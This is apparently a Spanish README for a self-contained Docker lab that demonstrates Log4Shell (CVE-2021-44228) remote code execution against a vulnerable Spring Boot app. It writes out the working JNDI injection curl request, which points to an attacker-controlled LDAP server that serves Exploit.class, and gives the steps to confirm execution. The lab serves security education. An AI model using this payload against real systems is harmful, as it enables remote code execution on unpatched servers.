
Demo de exploit RCE basado en Docker para Log4Shell (CVE-2021-44228) con aplicación Spring Boot vulnerable, servidor LDAP malicioso y entrega de carga útil mediante inyección JNDI.
Este proyecto simula un escenario de ataque RCE a través de la vulnerabilidad Log4Shell en la librería Apache Log4j 2.
Exploit.class.Requiere Docker y Docker Compose instalados.
docker compose up --build
Espera hasta que ambos contenedores estén listos. vulnerable-app se ejecutará en el puerto 8080.
Abre una nueva terminal y envía una solicitud que contenga el payload JNDI mediante la cabecera X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Verás el mensaje del payload registrado.attacker. Verás la conexión LDAP redirigida al servidor HTTP./tmp/pwned ha sido creado dentro del contenedor vulnerable-app:docker exec -it vulnerable-app ls -la /tmp/pwned
Si el archivo existe, ¡significa que el código malicioso Exploit.class se ejecutó correctamente!
Este proyecto tiene fines exclusivamente educativos y de investigación en seguridad. No lo utilices bajo ninguna circunstancia con fines ilegales.